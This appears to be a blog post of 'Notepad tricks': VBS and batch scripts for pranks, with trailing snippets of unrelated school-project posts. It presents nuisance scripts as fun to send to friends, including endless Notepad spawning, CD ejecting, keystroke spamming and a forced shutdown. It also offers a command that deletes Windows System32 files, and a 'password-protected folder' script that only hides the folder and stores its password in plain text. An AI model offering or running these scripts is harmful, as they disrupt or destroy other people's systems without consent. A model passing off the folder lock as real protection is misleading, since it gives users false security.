Skip to main content

Notepad Tricks (Codes & Hacks)

What is Notepad?

It is a software which is present on every OS (Operating System) of the computer. However, there may name changes of that software. Well, don’t worry If you are using windows then it will help you very easily. Notepad is like you can just program your computer with it and that computer will do work as said in programs. You can do a lot of fun with these Notepad tricks. If you want to learn programming of Notepad then I will suggest you learn Batch Programming. It is using in Notepad tricks, well you can use a lot of other languages but these tricks are especially for funny and cool notepad tricks. And you can make HTML files and use all other programming languages. But you should change the extension of Notepad. Extension starts from (.bat .html .tag .vbs etc) there are lot of extension. You can also make your friend jealous of you with the help of these notepad tricks.

Best Notepad Tricks (Cool Notepad Tricks)

#1. Make Fake Windows error with the Notepad Tricks.

With the help of this trick, you can make your friends problem and feel them worry about their PC. So, you can use this type of trick.
  • Open Notepad.
  • Type X=Msgbox(“Put your Message Here”,0+16,”Put Title Here”)
  • You can replace put your message here and put a funny sentence. It will be visible when this error occurred.
  • Save this file as errors.vbs

#2. Force CD Drive to Open continually

  • Just open your notepad and paste these codes.
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
  • Then save this file as CDhack.vbs
  • When you double click on that program then CD Drive will open automatically.

#3. Make Own Daily Diary in Notepad

This is amazing Notepad tricks which will allow you to make your own Dialy diary. When you write anything on this notepad then it will automatically add time and date to your text. It is Cool Notepad tricks. You should follow some steps to do:
  • First thing first, So you have to open notepad and it is because it is very important step ðŸ˜€
  • Type .LOG on your Notepad.
  • Then save it as Diary.txt
  • So, whenever you will write something on this notepad it will add time and date.
Open Notepad in friend’s computer continuously
Type this in Notepad
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
Save it as tech maniya.bat and send it your friend. When He will open that program then He will be in small trouble.

#4. Make Keyboard LED lights to Dance

Don’t think that these lights will dance and entertain you. But it will flicker like on and off lights. Your all lights Num lock, scroll lock, caps lock.
  • Just Open your Notepad.
  • Paste this secret code in your notepad.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
  • Save this file as Disco.vbs
  • So, whenever you will open it then your all lights will dance like it will blinks.

#5. Test your Antivirus with Notepad

This is an amazing Notepad trick to check your antivirus program. You have to follow some basic steps.
  • Open Notepad and paste below codes.
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  • And Now save this file as ANTIvirus.exe
  • So, if your antivirus is working perfectly then your antivirus will tell you to delete this file.
  • If nothing happens then just change your antivirus Now.

#6. Matrix effect with Notepad

This trick is most popular notepad tricks and cool notepad tricks.
  • Just open Notepad and paste the following codes.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
  • Save this file as MaTrIx.bat

#7. Repeat messages on screen continuously

  • Open your notepad and paste this code
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
  • Now save this file as Rpt.bat

#8. Type YOU ARE FOOL Continuously

  • Just copy this code.
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
  • And save this file as MSG.vbs and that’s it.

#9. Force windows to shut down

With the help of this trick your windows will shut down forcedly.
  • Just open notepad
  • Paste @echo off in next line.
  • Paste *shutdown computer in next line.
  • Paste shutdown –c “sleep tight” –s
  • Save this file as Shut.bat
  • Then just open that notepad and then your PC will automatically shut down.

#10. Make password protected folder with Notepad

If you don’t want to use folder lock then you can use this self-made locker for your folders. This is really amazing and interesting notepad tricks.
  • Open your Notepad.
@ECHO OFF
title Folder Private
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock the folder
set/p “pass=>”
if NOT %pass%== techmaniya.com goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
  • com wrote in red color in your password.
  • Save that file as folderlock.bat
  • Now paste those files under folderlock.bat and your password will be techmaniya.com
  • So, no one will able to see your folders without your permission.

#11. Pressing Backspace Automatically

  • Just Open your Notepad and enter this code.
MsgBox “Backspace again and again and AGAIN”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
  • Then save as to BS.vbs format.
After opening it, backspace will automatically start pressing.

#12. Delete Windows/System32 (Notepad Codes)

With the help of this trick you can delete all files of System32, then windows will be corrupted.
DEL C:\WINDOWS\SYSTEM32\*.*/Q
Save it as .bat then open it. After that your system files will be deleted.
Note: Don’t use this code, unless you don’t know about windows corrupt. 

Comments

Popular posts from this blog

Banking (ICSE Class 10 Mathematics Project)

BANK ACCOUNT A bank account is a financial account between a bank customer and a financial institution. A bank account can be a deposit account, a credit card, or any other type of account offered by a financial institution. The financial transactions which have occurred within a given period of time on a bank account are reported to the customer on a bank statement and the balance of the account at any point in time is the financial position of the customer with the institution. a fund that a customer has entrusted to a bank and from which the customer can make withdrawals. BANK A bank is a financial institution and a financial intermediary that accepts deposits and channels those deposits into lending activities, either directly by loaning or indirectly through capital markets. A bank links together customers that have capital deficits and customers with capital surpluses. The word bank was borrowed in Middle English from Middle French banque, from Old Italian banca

Sarvepalli Radhakrishnan- Class 10 History ICSE Project

Sarvepalli Radhakrishnan Sarvepalli Radhakrishnan listen    (5 September 1888 – 17 April 1975) was an Indian philosopher and statesman who served as the first Vice President of India (1952–1962) and the second President of India (1962-1967). Sarvepalli Radhakrishnan was born on September 5, 1888 at Tirutani, Madras in a poor Brahmin family. As his father was poor Radhakrishnan supported most of his education through scholarships.  His father worked as a subordinate revenue official in the service of a local zamindar (landlord) and the family was a modest one. He did not want his son to receive an English education and wanted him to become a priest. But life had other plans for the young boy.   Dr. Sarvepalli Radhakrishnan had his early education at Gowdie School, Tiruvallur and then went to the Lutheran Mission School in Tirupati for his high school. He joined the Voorhee's College in Vellore and later switched to the Madras Christian College. He chose Philosophy as his ma

ICSE Class X - Math Project (Types of Bank Accounts in India)

Types of Bank Accounts in India With the advancement in banking technology, many banks are offering tailor made products to suit individual needs. While accounts may differ from bank to bank their purpose remain the same. Many banks have different products on the basis of customer's age, income and gender. Here are a few different kinds of bank accounts. There are mainly three types of Banking accounts in India: Demand Deposits Term Deposits Non-Resident Deposits Now, we will study one by one, starting from Demand Deposits. 1. Demand Deposit In these types of accounts, money is payable on demand. It includes current accounts and savings accounts ( CASA - Current Account and Savings Account ) (A)  Savings account:  A savings account is an interest-bearing account held at a bank.   There are mainly three types of saving accounts in Indian banks:          (i) Basic Savings Bank Deposit Accounts (BSBDA)          (ii) Basic Saving Bank Deposit Acco